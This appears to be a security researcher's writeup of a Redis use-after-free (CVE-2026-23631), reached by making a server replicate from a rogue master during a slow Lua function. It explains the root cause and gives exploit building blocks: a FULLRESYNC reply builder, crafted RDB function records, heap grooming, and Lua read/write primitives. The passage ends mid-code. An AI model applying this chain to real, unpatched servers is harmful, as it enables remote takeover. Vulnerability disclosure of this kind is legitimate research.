
In December 2025, I participated in the ZeroDay.Cloud 2025 competition in London. I decided to target Redis (post-authentication) because of its complexity and its large, interesting attack surface. During my research, I found DarkReplica (CVE-2026-23631), a post-authentication Use-After-Free (UAF) vulnerability in the replication subsystem of the Redis server. The vulnerability involves making the target server a "slave" of an attacker-controlled server (using the SLAVEOF command) and then abusing a logic flaw in the synchronization process, which leads to a UAF in the Lua functions engine.
This writeup describes the root cause of the vulnerability, as well as the exploitation journey all the way to Remote Code Execution.
Remediation
Redis patched the bug on May 5, 2026. The fix was shipped across all five maintained release series.
| Release series | Affected versions | Fixed version |
|---|---|---|
| Redis 7.2.x | 7.2.0 – 7.2.13 | 7.2.14 |
| Redis 7.4.x | 7.4.0 – 7.4.8 | 7.4.9 |
| Redis 8.2.x | 8.2.0 – 8.2.5 | 8.2.6 |
| Redis 8.4.x | 8.4.0 – 8.4.2 | 8.4.3 |
| Redis 8.6.x | 8.6.0 – 8.6.2 | 8.6.3 |
Background
Redis's Built-In Lua Engine(s)
One of the most promising attack surfaces of Redis is the Lua engine. Redis includes a built-in Lua engine that allows developers to execute atomic functions on the server that can manipulate data. The Lua interpreter itself is a forked Lua 5.1 engine with some modifications made by Redis developers. Of course, Lua code runs in a sandboxed Lua environment in order to prevent remote code execution. In fact, Redis does not contain just one Lua engine, but two separate ones:
The scripting engine (SCRIPT LOAD/EVAL/EVALSHA/…)
The older model. It allows running scripts and storing them on the server, and then calling them again using their SHA1 hash. It also contains "LDB" (SCRIPT DEBUG), which is a Lua debugger implemented by Redis on top of Lua hooks.
127.0.0.1:6379> SCRIPT LOAD "return KEYS[1] .. ' ' .. ARGV[1]"
"406bf0497c622efb466704c62042f34776db84b7"
127.0.0.1:6379> EVALSHA 406bf0497c622efb466704c62042f34776db84b7 1 Hello World
"Hello World"
The functions engine (FUNCTION LOAD/FCALL/…)
The newer model. It allows registering libraries containing functions, which are then callable by name using FCALL. The functions engine has a generic design and might support other scripting languages in the future; currently, only Lua 5.1 is supported. Functions are also persistent (stored in RDB/AOF files and synced to other nodes), whereas scripts are only stored in memory.
127.0.0.1:6379> FUNCTION LOAD "#!lua name=mylib \n redis.register_function('myfunc', function(keys, argv) return keys[1] .. ' ' .. argv[1] end)"
"mylib"
127.0.0.1:6379> FUNCTION LIST
1) 1) "library_name"
   2) "mylib"
   3) "engine"
   4) "LUA"
   5) "functions"
   6) 1) 1) "name"
         2) "myfunc"
         3) "description"
         4) (nil)
         5) "flags"
         6) (empty array)
127.0.0.1:6379> FCALL myfunc 1 Hello World
"Hello World"
127.0.0.1:6379> FUNCTION FLUSH
OK
127.0.0.1:6379> FUNCTION LIST
(empty array)
For the sake of this writeup, I am going to focus specifically on the functions engine, but remember the scripting engine for later.
Vulnerability Root Cause Analysis
Slow Scripts
When executing arbitrary Lua code, an issue might arise: what if the code has some bug that makes it run for a very long time (or even forever)? Since Redis is a single-threaded server, this would block the server completely and deny service to other users. This is where FUNCTION KILL comes into play. After 5 seconds of executing a function, Redis prints the following log line:
1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds. You can try killing the script using the FUNCTION KILL command. Script name is: scam.
This Redis command kills the currently executing function. An attentive reader might now ask: "Wait, you said that Redis is single-threaded! So how will it handle the FUNCTION KILL command while it's blocked?". Well, this is why Redis installs a custom Lua hook function before executing the user script:
lua_sethook(lua, luaMaskCountHook, LUA_MASKCOUNT, 100000);
static void luaMaskCountHook(lua_State *lua, lua_Debug *ar) {
    // rctx: the current script run context (its lookup is elided here)
    if (scriptInterrupt(rctx) == SCRIPT_KILL) {
        // ...
    }
}
int scriptInterrupt(scriptRunCtx *run_ctx) {
    if (run_ctx->flags & SCRIPT_TIMEDOUT) {
        /* script already timedout
           we just need to process some events and return */
        processEventsWhileBlocked();
        return (run_ctx->flags & SCRIPT_KILLED) ? SCRIPT_KILL : SCRIPT_CONTINUE;
    }
    // ...
}
This hook executes every 100K Lua instructions. It checks whether the function has timed out (5 seconds by default) and, if so, calls processEventsWhileBlocked(), which handles pending events (for example, I/O events) from the Redis event loop. This is how the server is able to handle other connections while a Lua function is blocking it.
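The hook mechanism can be illustrated with a small, self-contained C model. This is not Redis code: every name below (toy_run_ctx, toy_interrupt, and so on) is hypothetical, and "time" is measured in executed instructions instead of milliseconds so the behavior is deterministic. The model mirrors the structure described above. A hook fires every HOOK_INTERVAL instructions, and once the limit is exceeded, each hook call gives the event loop a turn. That turn is where a FUNCTION KILL, or anything else, can be served.

```c
#include <stdbool.h>

/* Toy model only: names are hypothetical, not Redis identifiers. */
#define HOOK_INTERVAL 100000UL /* mirrors the 100K-instruction count hook */

typedef struct {
    unsigned long executed;      /* instructions run so far */
    unsigned long time_limit;    /* stand-in for the 5-second limit */
    bool timed_out;              /* like SCRIPT_TIMEDOUT */
    bool killed;                 /* like SCRIPT_KILLED */
    unsigned long events_served; /* how often the event loop got a turn */
    unsigned long kill_after;    /* a "FUNCTION KILL" arrives on this turn (0 = never) */
} toy_run_ctx;

/* Stand-in for processEventsWhileBlocked(): other connections are serviced here. */
static void toy_process_events(toy_run_ctx *ctx) {
    ctx->events_served++;
    if (ctx->kill_after && ctx->events_served >= ctx->kill_after)
        ctx->killed = true;
}

/* Stand-in for scriptInterrupt(): returns true if the script must stop. */
static bool toy_interrupt(toy_run_ctx *ctx) {
    if (!ctx->timed_out && ctx->executed >= ctx->time_limit)
        ctx->timed_out = true;
    if (ctx->timed_out)
        toy_process_events(ctx);
    return ctx->killed;
}

/* Runs a `while 1 do end` script; returns the number of instructions executed. */
static unsigned long toy_run_busy_script(toy_run_ctx *ctx, unsigned long max_insns) {
    while (ctx->executed < max_insns) {
        ctx->executed++; /* one VM instruction */
        if (ctx->executed % HOOK_INTERVAL == 0 && toy_interrupt(ctx))
            break; /* killed: unwind the script */
    }
    return ctx->executed;
}
```

For example, with time_limit set to 500000 and a kill request arriving on the third event-loop turn, the busy loop stops after 700000 instructions.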
This opens a door to many potential issues. For example: what if someone calls the FUNCTION FLUSH command while a slow function is running? Wouldn't it cause the server to release all Lua functions while one of them is being executed? Fortunately, Redis developers did see that coming:
int processCommand(client *c) {
    // ...
    /* when a busy job is being done (script / module)
     * Only allow a limited number of commands. */
    if (isInsideYieldingLongCommand() && !(c->cmd->flags & CMD_ALLOW_BUSY)) {
        // ...
        rejectCommand(c, shared.slowscripterr);
        // ...
    }
    // ...
}
Only a few specific commands (including FUNCTION KILL and SCRIPT KILL) can be executed while a timed-out function is running. Any other command is rejected with the following error:
(error) BUSY Redis is busy running a script. You can only call FUNCTION KILL or SHUTDOWN NOSAVE.
The Loophole
An interesting fact is that processEventsWhileBlocked() handles not only I/O events from regular clients, but all I/O events. So if the Redis server is a replica ("slave"), data sent from its master server, including a full resynchronization, will also be handled! And on that path, nothing checks whether a function is currently executing before performing state-changing operations.
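The asymmetry can be summarized with a toy dispatcher (hypothetical names, not Redis code). Commands from ordinary clients pass an allowlist check similar to the processCommand() snippet above. In this model, a full resync arriving over the replication link is acted on without looking at the busy state at all.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Toy model (hypothetical names) of the two paths through the blocked event loop. */
#define TOY_CMD_ALLOW_BUSY (1u << 0)

typedef struct { const char *name; unsigned flags; } toy_cmd;

static const toy_cmd toy_cmds[] = {
    {"FUNCTION KILL", TOY_CMD_ALLOW_BUSY},
    {"SCRIPT KILL", TOY_CMD_ALLOW_BUSY},
    {"FUNCTION FLUSH", 0},
    {"SET", 0},
};

typedef enum { TOY_EV_CLIENT_CMD, TOY_EV_MASTER_FULLRESYNC } toy_event_kind;

/* Returns true if the event is acted upon, given whether a script is busy. */
static bool toy_handle_event(toy_event_kind kind, const char *cmd_name, bool busy) {
    if (kind == TOY_EV_MASTER_FULLRESYNC)
        return true; /* the gap: no busy check on this path in this model */
    for (size_t i = 0; i < sizeof toy_cmds / sizeof toy_cmds[0]; i++) {
        if (strcmp(toy_cmds[i].name, cmd_name) == 0)
            /* mirrors: reject if busy and the command lacks CMD_ALLOW_BUSY */
            return !(busy && !(toy_cmds[i].flags & TOY_CMD_ALLOW_BUSY));
    }
    return false; /* unknown command */
}
```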
Redis Replication
Redis allows assigning a "master server" to another server (using the SLAVEOF command). The slave connects to the master and receives updates and full/partial synchronizations in order to mirror the master's full state. When the slave sends PSYNC, the master (in our case, fully attacker-controlled) can answer with FULLRESYNC and then provide an RDB file (Redis's data serialization and storage format), which the slave writes locally and loads.
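For reference, here is a minimal C sketch of the reply an attacker-controlled master could send once the replica issues PSYNC, based on the standard replication protocol. The reply is a +FULLRESYNC line with a replication ID and offset, followed by a bulk-length header after which the raw RDB bytes are streamed. The replication ID and offset are placeholders, and build_fullresync_header is a hypothetical name. The earlier handshake replies (to PING and REPLCONF) and the diskless "$EOF:" variant are not shown.

```c
#include <stdio.h>
#include <string.h>

/* Writes "+FULLRESYNC <replid> <offset>\r\n$<rdb_len>\r\n" into out.
 * The RDB payload follows this header directly (no trailing CRLF).
 * Returns the snprintf() result (length of the full header). */
static int build_fullresync_header(char *out, size_t cap, const char *replid,
                                   long long offset, size_t rdb_len) {
    return snprintf(out, cap, "+FULLRESYNC %s %lld\r\n$%zu\r\n",
                    replid, offset, rdb_len);
}
```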
RDB Structure
RDB is a fairly simple format. It contains a list of records, each starting with a one-byte type (an "opcode") followed by data whose structure depends on that type. Besides the value types used for key/value pairs, these are the special RDB opcodes:
/* Special RDB opcodes (saved/loaded with rdbSaveType/rdbLoadType). */
#define RDB_OPCODE_SLOT_INFO 244 /* Individual slot info, such as slot id and size (cluster mode only). */
#define RDB_OPCODE_FUNCTION2 245 /* function library data */
#define RDB_OPCODE_FUNCTION_PRE_GA 246 /* old function library data for 7.0 rc1 and rc2 */
#define RDB_OPCODE_MODULE_AUX 247 /* Module auxiliary data. */
#define RDB_OPCODE_IDLE 248 /* LRU idle time. */
#define RDB_OPCODE_FREQ 249 /* LFU frequency. */
#define RDB_OPCODE_AUX 250 /* RDB aux field. */
#define RDB_OPCODE_RESIZEDB 251 /* Hash table resize hint. */
#define RDB_OPCODE_EXPIRETIME_MS 252 /* Expire time in milliseconds. */
#define RDB_OPCODE_EXPIRETIME 253 /* Old expire time in seconds. */
#define RDB_OPCODE_SELECTDB 254 /* DB number of the following keys. */
#define RDB_OPCODE_EOF 255 /* End of the RDB file. */
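A malicious master has to serialize its own RDB_OPCODE_FUNCTION2 records. The sketch below makes one assumption, based on my understanding of recent versions: the record body is a single length-prefixed string holding the library source, which is what rdbFunctionLoad() reads. It implements only the 6-, 14-, and 32-bit forms of RDB's length encoding, and rdb_encode_len/rdb_put_function2 are hypothetical names. A complete file would also need the "REDIS" magic and version header, plus an RDB_OPCODE_EOF trailer with its checksum. Those are omitted here.

```c
#include <stddef.h>
#include <string.h>

#define RDB_OPCODE_FUNCTION2 245

/* RDB length encoding (lengths below 2^32 only in this sketch):
 * 00xxxxxx -> 6-bit, 01xxxxxx xxxxxxxx -> 14-bit, 0x80 + 4 bytes big-endian -> 32-bit. */
static size_t rdb_encode_len(unsigned char *out, unsigned long len) {
    if (len < (1UL << 6)) {
        out[0] = (unsigned char)len;
        return 1;
    }
    if (len < (1UL << 14)) {
        out[0] = (unsigned char)(0x40 | (len >> 8));
        out[1] = (unsigned char)(len & 0xff);
        return 2;
    }
    out[0] = 0x80;
    out[1] = (unsigned char)((len >> 24) & 0xff);
    out[2] = (unsigned char)((len >> 16) & 0xff);
    out[3] = (unsigned char)((len >> 8) & 0xff);
    out[4] = (unsigned char)(len & 0xff);
    return 5;
}

/* Appends one FUNCTION2 record: the opcode byte, then the library source as a
 * length-prefixed string. The caller must size `out` generously. */
static size_t rdb_put_function2(unsigned char *out, const char *code) {
    size_t len = strlen(code);
    size_t n = 0;
    out[n++] = RDB_OPCODE_FUNCTION2;
    n += rdb_encode_len(out + n, (unsigned long)len);
    memcpy(out + n, code, len);
    return n + len;
}
```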
RDB Functions Synchronization
As you might guess, I chose to focus on the RDB_OPCODE_FUNCTION2 opcode. The slave should always sync its functions and libraries with the master. So for each defined Lua "library" in the master, a record with opcode RDB_OPCODE_FUNCTION2 is sent to the slave together with the relevant Lua code. The slave immediately loads it:
} else if (type == RDB_OPCODE_FUNCTION2) {
    sds err = NULL;
    if (rdbFunctionLoad(rdb, rdbver, rdb_loading_ctx->functions_lib_ctx, rdbflags, &err) != C_OK) {
        serverLog(LL_WARNING,"Failed loading library, %s", err);
        sdsfree(err);
        goto eoferr;
    }
    continue;
}
Under normal circumstances, when performing a FULLRESYNC, emptyData() will be called to empty the server before loading the new RDB. It will then call functionsLibCtxClearCurrent(), which will free the current functions context and related objects, and initialize a new one:
void functionsLibCtxClearCurrent(int async) {
    if (async) {
        functionsLibCtx *old_l_ctx = curr_functions_lib_ctx;
        dict *old_engines = engines;
        freeFunctionsAsync(old_l_ctx, old_engines);
    } else {
        functionsLibCtxFree(curr_functions_lib_ctx);
        dictRelease(engines); // <-------
    }
    functionsInit();
}
/* Free the given functions ctx */
void functionsLibCtxFree(functionsLibCtx *functions_lib_ctx) {
    functionsLibCtxClear(functions_lib_ctx);
    dictRelease(functions_lib_ctx->functions);
    dictRelease(functions_lib_ctx->libraries);
    dictRelease(functions_lib_ctx->engines_stats);
    zfree(functions_lib_ctx);
}
The dictRelease(engines) call frees the current lua_State object (the global Lua interpreter object)! Afterwards, the new functions from the RDB are loaded into a new functions context: when loading an RDB_OPCODE_FUNCTION2 record, rdb_loading_ctx->functions_lib_ctx is not the global functions context but a fresh one, which replaces the global context at the end of the RDB load.
After returning from processEventsWhileBlocked(), our Lua function will continue running, but now with a completely freed Lua engine.
Triggering the Vulnerability
So the plan is as follows:
- Register a slow Lua function (while 1 do end).
- Make the server a slave of our master server (SLAVEOF). The server will start connecting to us "in the background".
- Disable the (automatically set) slave-read-only config option (using CONFIG SET); this allows FCALL to execute once the server enters slave mode.
- Execute our slow Lua function.
- 5 seconds later, the script times out and the server continues receiving events from our master server. Initiate a FULLRESYNC.
- The functions Lua engine (including the lua_State itself) gets freed.
- Execution returns to our slow function.
- UAF!
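The sequence above boils down to a stale reference across a re-entrant event-loop call. The following toy model makes the logic flaw explicit. It uses hypothetical names and frees nothing; an engine "generation" counter stands in for the lua_State. The slow function remembers the engine it started on, and the hook serves the pending FULLRESYNC once the timeout has passed. When control returns, the function is running on an engine that no longer exists.

```c
#include <stdbool.h>

/* Toy model (hypothetical names): no real memory is freed here. */
typedef struct {
    unsigned engine_gen;     /* bumps whenever the Lua engine is torn down */
    bool fullresync_pending; /* the master has queued a full resync */
} toy_server;

/* Stand-in for emptyData() -> functionsLibCtxClearCurrent(): old engine gone, new one created. */
static void toy_fullresync(toy_server *s) {
    s->engine_gen++;
    s->fullresync_pending = false;
}

/* Hook body: after the timeout, pending replication events get served. */
static void toy_hook(toy_server *s, bool timed_out) {
    if (timed_out && s->fullresync_pending)
        toy_fullresync(s);
}

/* Returns true if the function resumes on an engine that no longer exists. */
static bool toy_run_slow_function(toy_server *s, int hook_calls, int timeout_after) {
    unsigned my_gen = s->engine_gen; /* engine the function started on */
    for (int i = 1; i <= hook_calls; i++)
        toy_hook(s, i > timeout_after);
    return my_gen != s->engine_gen; /* stale: this is the use-after-free window */
}
```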
Sure enough, we get a beautiful crash dump:
1:S 33 Jul 2025 13:37:13.337 * Before turning into a replica, using my own master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
1:S 33 Jul 2025 13:37:13.337 * Connecting to MASTER 172.18.0.1:8474
1:S 33 Jul 2025 13:37:13.337 * MASTER <-> REPLICA sync started
...
1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds.
...
=== REDIS BUG REPORT START: Cut & paste starting from here ===
1:S 33 Jul 2025 13:37:13.337 # Redis 8.4.0 crashed by signal: 11, si_code: 128
1:S 33 Jul 2025 13:37:13.337 # Accessing address: (nil)
1:S 33 Jul 2025 13:37:13.337 # Crashed running the instruction at: 0x648a03093f37
Exploitation
The primitive we achieved is executing a Lua function while it, its state, its "stack", and every object related to it are all freed! While this is a very strong primitive, it is also very chaotic. The lua_State is a fairly complex object with references to many other objects (of various sizes). Very precise heap control is necessary to allocate all of these objects exactly right, so that the program does not accidentally crash at some point.
Furthermore, there are objects that we simply cannot fake without additional primitives. For example, every Lua operation that allocates memory calls lua_State->l_G->frealloc(), which is essentially a custom malloc() callback. Since we do not have an ASLR leak yet, we cannot write a valid pointer to executable memory there.
The Lua VM
Before we dive into the exploitation itself, we have to first introduce some core concepts of the Lua VM.
Lua has its own bytecode format that runs in a register-based VM. It also has a stack that contains called functions, arguments to functions, local variables, and the "registers" themselves (which are just dedicated positions on the function stack frame). Every Lua bytecode instruction manipulates some variables on the stack. For example:
- ADD R2 R0 R1 takes 2 numbers from stack positions 0 and 1, adds them, and stores the result in stack position 2 (R2 = R0 + R1).
- CALL R1 5 4 calls the function at stack position 1 with the arguments from stack positions 2 (func+1) to 5 (func+5-1), and expects to receive 3 return values in stack positions 1 (func) to 3 (func+4-2).
In addition, a Lua function also has a constant list that instructions can reference using K1, K2, ...
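The register arithmetic for CALL can be written down directly. This helper is a sketch that decodes the fixed-count form of Lua 5.1's CALL A B C (arguments in R(A+1)..R(A+B-1), results in R(A)..R(A+C-2)). The B == 0 and C == 0 variable-count forms are deliberately not handled, and call_layout/decode_call are illustrative names.

```c
/* Register ranges touched by a fixed-count Lua 5.1 CALL A B C (B, C >= 1). */
typedef struct {
    int func;                /* R(A): the callee */
    int nargs;               /* B - 1 */
    int first_arg, last_arg; /* meaningful only when nargs > 0 */
    int nresults;            /* C - 1 */
    int first_res, last_res; /* meaningful only when nresults > 0 */
} call_layout;

static call_layout decode_call(int a, int b, int c) {
    call_layout l;
    l.func = a;
    l.nargs = b - 1;
    l.first_arg = a + 1;     /* func+1 */
    l.last_arg = a + b - 1;  /* func+B-1 */
    l.nresults = c - 1;
    l.first_res = a;         /* results overwrite the callee slot onward */
    l.last_res = a + c - 2;  /* func+C-2 */
    return l;
}
```

decode_call(1, 5, 4) reproduces the example above (4 arguments in R2..R5, 3 results in R1..R3). decode_call(0, 4, 1) describes a call with 3 arguments in R1..R3 and no results.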
Lua 5.1 also features an incremental GC implementation, which we won't dive into, as it's not directly relevant to our exploit.
Primitives
Returning to our exploitation strategy: besides the UAF primitive, we also have some small memory primitives that will help us later.
Heap Address Leakage
Fortunately for us, Lua's default tostring() function returns pointers for values that are not strings, numbers, booleans, or nil!
tostring({})
-- table: 0x634b5724c340
This is, in fact, a pointer to the GCObject structure, which is a union that can represent all existing Lua object types.
typedef struct lua_TValue {
    Value value;
    int tt; // type
} TValue;
typedef union {
    GCObject *gc;
    void *p;
    lua_Number n; // for number values
    int b;
} Value;
union GCObject {
    GCheader gch; // GC header
    union TString ts; // for string values
    union Udata u; // for userdata values
    union Closure cl; // for function values
    struct Table h; // for table values
    struct Proto p; // for function prototypes
    struct UpVal uv; // for function upvals
    struct lua_State th; // for "threads" (coroutines)
};
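Since Lua 5.1 formats these values as "%s: %p", turning the string back into a number is simple. The helper below is a hypothetical C sketch of that parsing step. It assumes glibc-style %p output with a "0x" prefix.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Parses the address out of a tostring() result such as "table: 0x634b5724c340".
 * Returns 0 if the string has no ": 0x" part (e.g. for strings or numbers). */
static uint64_t toaddr_from_string(const char *s) {
    const char *p = strstr(s, ": 0x");
    if (!p)
        return 0;
    /* strtoull with base 16 accepts the optional "0x" prefix */
    return (uint64_t)strtoull(p + 2, NULL, 16);
}
```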
malloc()
We can build a malloc() primitive — the ability to allocate an arbitrary string in memory and know its address.
Since tostring() does not return a pointer for string values, we need another way to learn where a string lives. The default allocator for Redis is Jemalloc, and as a result of its tcache implementation (and thanks to Redis being single-threaded), when we free() an object and then malloc() an object of the same size class, we deterministically get the same address back.
local a = coroutine.create(function() end) -- Allocates a coroutine
local addr = tostring(a) -- Saves the address for its lua_State object (size 184)
a = nil -- Removes the reference to the coroutine object
collectgarbage("collect") -- Triggers the GC, which will free the lua_State object
a = "AAAAAA..." .. "A" -- Allocates a string with our payload of size 184 - sizeof(TString) (the string header)
-- Our buffer is now allocated in the same address as the freed coroutine (which we know) + sizeof(TString)
We use CONCAT (..) in order to allocate the string exactly when we need it; otherwise, it would be stored as a function constant at compilation time and would not get allocated again.
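The deterministic reuse that the malloc() primitive relies on can be modeled as a per-size-class LIFO stack. This is a deliberately simplified toy, not jemalloc's actual tcache implementation. The names toy_bin, toy_free, toy_malloc, and toy_payload_addr are hypothetical, and the model ignores everything except the last-freed, first-reused order.

```c
#include <stddef.h>

#define TOY_BIN_CAP 16

/* One size class: a stack of recently freed slots. */
typedef struct {
    void *slots[TOY_BIN_CAP];
    int count;
} toy_bin;

/* free(): push the slot onto the bin (dropped if the bin is full). */
static void toy_free(toy_bin *bin, void *p) {
    if (bin->count < TOY_BIN_CAP)
        bin->slots[bin->count++] = p;
}

/* malloc() for this size class: pop the most recently freed slot, if any.
 * NULL stands for "fall back to the arena", which this toy does not model. */
static void *toy_malloc(toy_bin *bin) {
    return bin->count > 0 ? bin->slots[--bin->count] : NULL;
}

/* Where a string's bytes start once its object lands in a known slot. */
static void *toy_payload_addr(void *slot, size_t header_size) {
    return (char *)slot + header_size;
}
```

Freeing slots a and then b makes the next two same-class allocations return b and then a. A string placed in a known slot starts header_size bytes in (sizeof(TString) in the scheme above).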
Because the functions engine is about to be freed, we use the separate Lua scripting engine (remember?) in order to allocate our objects, and then turn its GC off to prevent it from releasing our objects.
After allocating on top of the vulnerable freed lua_State, this primitive will also allow us to control the whole "tree of objects" (control other objects it references), since we can now write data to the heap at known addresses.
Allocating the Freed Buffers
We need to "spray" the heap in order to allocate on top of the just-freed objects. Redis has a separate Jemalloc arena for Lua scripts, which means only Lua objects can "exploit" our UAF. Fortunately for us, the next thing that happens after freeing the Lua engine is, conveniently, loading our RDB. As explained above, our RDB can contain RDB_OPCODE_FUNCTION2 records which contain Lua function registration code that will get executed immediately. This script is controlled by us and can allocate objects in order to spray the heap and allocate on top of the freed objects we need.
Taking Control Over the Lua VM
So now we have everything we need. Let's allocate on top of the freed lua_State!
Another issue arises: remember what we said about Jemalloc's tcache? The next object that gets allocated right after freeing the old engine's lua_State is the new one. As expected, it deterministically gets allocated on top of the old one. :(
To work around this issue, we can abuse Lua coroutines, Lua's implementation of "threads". They are not really threads, but rather generator-like functions that can pause execution midway, yield results, and later be resumed.
local co = coroutine.create(function(x)
    for i = 1, x do
        coroutine.yield(i)
    end
end)
local success, a = coroutine.resume(co, 5)
print(a) -- 1
success, a = coroutine.resume(co)
print(a) -- 2
-- ...
What's interesting here is that every coroutine runs in its own lua_State. So if we run our slow function (the one that gets freed) inside a coroutine, then even after the new engine's lua_State is allocated on top of the old one, we can still allocate on top of the coroutine's lua_State and take control of the function's Lua VM.
#!lua name=mylib
redis.register_function("hoax", function()
    co = coroutine.create(function(a)
        -- This function runs in a separate lua_State
        while 1 do end
    end)
    coroutine.resume(co)
end)
Stabilizing the VM
We can now execute arbitrary Lua opcodes in a custom Lua environment with our own fake objects on the stack. We are getting close.
The next issue is that we are very limited in what we can actually do without crashing the program, because of various constraints (e.g., the frealloc() issue explained above). "Stabilizing" the VM will help us a lot. For that, we can use another trick related to Lua coroutines.
Let's build the following Lua stack layout:
[0] LUA_TFUNCTION - coroutine.resume
[1] LUA_TTHREAD - stage3_co
[2] LUA_TTABLE - fakeobj1
[3] LUA_TTABLE - fakeobj2
...
- We can learn coroutine.resume's address by running tostring(coroutine.resume).
- stage3_co is a coroutine we allocate beforehand, which runs our function (we can also learn a coroutine's address using the same address leak primitive).
- We obtain both from the separate scripting engine, so they won't get freed!
Then, we can execute the following single Lua instruction:
CALL R0 4 1
This will execute coroutine.resume(stage3_co, fakeobj1, fakeobj2). Then, our function will continue execution in the (non-freed) coroutine's lua_State, while receiving our arbitrary fake objects as arguments!
We've just transferred our fake Lua objects from the "broken" Lua engine to another clean Lua engine!
Achieving a Write-What-Where Primitive
Now we can run Lua code in a fully functional environment and build fake objects. So, what objects can we fake? Let's take a look at the "table" (Lua's dictionary type) internal structures:
typedef struct Table {
    CommonHeader;
    lu_byte flags; /* 1<<p means tagmethod(p) is not present */
    int readonly;
    lu_byte lsizenode; /* log2 of size of `node' array */
    struct Table *metatable;
    TValue *array; /* array part */
    Node *node;
    Node *lastfree; /* any free position is before this position */
    GCObject *gclist;
    int sizearray; /* size of `array' array */
} Table;
In Lua, the table type is actually usable as both an array and a dictionary. Elements with a number index are stored in the Table->array array, and Table->sizearray represents its size. If we set array to 0x4141414141414141 and sizearray to 1, executing fake_table[1] = 1337 (Note: Lua indexes start at 1) will copy the number's TValue to Table->array[0] — in our case, the controlled address 0x4141414141414141!
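The integer-key store into a table's array part can be sketched in C. This is a simplified model, not Lua's own table code. toy_Table keeps only the array and sizearray fields, and keys outside 1..sizearray simply fail instead of falling back to the hash part. The sketch shows why whoever controls array controls where t[1] = x writes.

```c
#include <stdint.h>

#define TOY_LUA_TNUMBER 3 /* LUA_TNUMBER's value in Lua 5.1 */

typedef struct { union { void *gc; double n; } value; int tt; } toy_TValue;

/* Only the two fields that matter for integer-keyed access. */
typedef struct { toy_TValue *array; int sizearray; } toy_Table;

/* Simplified array-part store: t[key] = n for 1 <= key <= sizearray. */
static int toy_set_num(toy_Table *t, int key, double n) {
    if (key < 1 || key > t->sizearray)
        return 0; /* real Lua would use the hash part here */
    t->array[key - 1].value.n = n; /* Lua indexes start at 1 */
    t->array[key - 1].tt = TOY_LUA_TNUMBER;
    return 1;
}
```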
typedef struct lua_TValue {
    Value value;
    int tt; // type
} TValue;
typedef union {
    GCObject *gc;
    void *p;
    lua_Number n; // for number values
    int b;
} Value;
typedef double lua_Number;
For the Lua number type, TValue->tt == LUA_TNUMBER and TValue->value.n is the actual number (represented as a double).
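Two details matter for the primitives that follow. First, the type tag sits 8 bytes after the value. Second, numbers are IEEE-754 doubles, so raw 64-bit values have to be smuggled in by reinterpreting their bits. The C sketch below assumes a typical LP64 (for example x86-64) build. Its u64_to_double()/double_to_u64() are hypothetical C counterparts of what the exploit's uint64_to_double()/double_to_buf() helpers are used for.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mirror of Lua 5.1's TValue on LP64: an 8-byte Value union followed by the
 * int type tag, padded to 16 bytes. */
typedef union { void *gc; void *p; double n; int b; } Value;
typedef struct { Value value; int tt; } TValue;

/* Bit-for-bit reinterpretation (not numeric conversion) between uint64 and double. */
static double u64_to_double(uint64_t x) { double d; memcpy(&d, &x, sizeof d); return d; }
static uint64_t double_to_u64(double d) { uint64_t x; memcpy(&x, &d, sizeof x); return x; }
```

double_to_u64(3.0) is 0x4008000000000000, whose low 32 bits are zero. Writing the number 3 over a type tag would therefore produce LUA_TNIL rather than LUA_TNUMBER, which is why the read primitive writes uint64_to_double(3) instead.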
We can build the following memory layout:
fake_table1:
  array: 0
  sizearray: 1
fake_table2:
  array: &fake_table1->array
  sizearray: 1
Then, execute the write primitive twice:
- First, fake_table2[1] = addr (using fake_table2 to overwrite fake_table1->array with addr).
- Then, fake_table1[1] = value. This writes value to addr! (Note: it also copies TValue->tt (LUA_TNUMBER) to addr+8.)
local function write(addr, val)
    fake_table2[1] = uint64_to_double(addr) -- Override fake_table1's array pointer
    fake_table1[1] = uint64_to_double(val)
end
Achieving an Arbitrary Read Primitive
Executing local a = fake_table1[1] from Lua code reads a TValue from the given address and copies it to a local variable. The issue is that it also copies whatever is at addr+8 (an arbitrary value) as the type tag. We need that tag to be LUA_TNUMBER in order to read the value as a number from Lua code.
So… let's fake some more tables!
fake_table3_array:
  - value: 0
    tt: 0
fake_table3:
  array: &fake_table3_array
  sizearray: 1
fake_table4:
  array: &fake_table3->array[0].tt
  sizearray: 1
Instead of assigning to a local variable, we can do fake_table3[1] = fake_table1[1]. This copies the value we want to read to fake_table3_array->value and some random value to fake_table3_array->tt. Then, we do fake_table4[1] = uint64_to_double(3), which writes a double whose raw bits equal 3 over fake_table3_array->tt and thus "fixes" the type to be LUA_TNUMBER (which is 3 in Lua 5.1), since fake_table4->array points directly at fake_table3_array->tt. Now, we can just read fake_table3[1] as usual and get the value:
local function read(addr)
    fake_table2[1] = uint64_to_double(addr) -- Override fake_table1's array pointer
    fake_table3[1] = fake_table1[1] -- Read the value with a broken type to fake_table3[1]
    fake_table4[1] = uint64_to_double(3) -- Fix fake_table3[1]'s type to be LUA_TNUMBER
    local val = fake_table3[1] -- Read val as a double from fake_table3!
    val = double_to_buf(val) -- Convert it to a buf to get raw data
    return val
end
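Both primitives can be exercised end to end in plain C by modeling the fake tables as ordinary structs. The sketch uses hypothetical names, assumes a little-endian LP64 build, and omits Lua's bounds checks and hash part. Setting t[1] copies a whole 16-byte TValue to t->array, which is exactly the behavior the Lua code above abuses. fake_table2 overlays fake_table1->array, and fake_table4 overlays the tag of fake_table3's first element.

```c
#include <stdint.h>
#include <string.h>

#define LUA_TNUMBER 3 /* value from Lua 5.1's lua.h */

/* 16-byte TValue (LP64): 8-byte value, int tag, padding. */
typedef struct { union { void *gc; double n; } value; int tt; } TV;
/* Trimmed-down Table; sizearray is kept for fidelity, the helpers skip bounds checks. */
typedef struct { TV *array; void *node; int sizearray; } FakeTable;

static double u2d(uint64_t x) { double d; memcpy(&d, &x, sizeof d); return d; }
static uint64_t d2u(double d) { uint64_t x; memcpy(&x, &d, sizeof x); return x; }

/* t[1] = n: stores a whole TValue (value + LUA_TNUMBER tag) at t->array. */
static void set1_num(FakeTable *t, double n) {
    TV v;
    memset(&v, 0, sizeof v);
    v.value.n = n;
    v.tt = LUA_TNUMBER;
    memcpy(t->array, &v, sizeof v);
}

/* dst[1] = src[1]: copies 16 bytes, whatever the tag says. */
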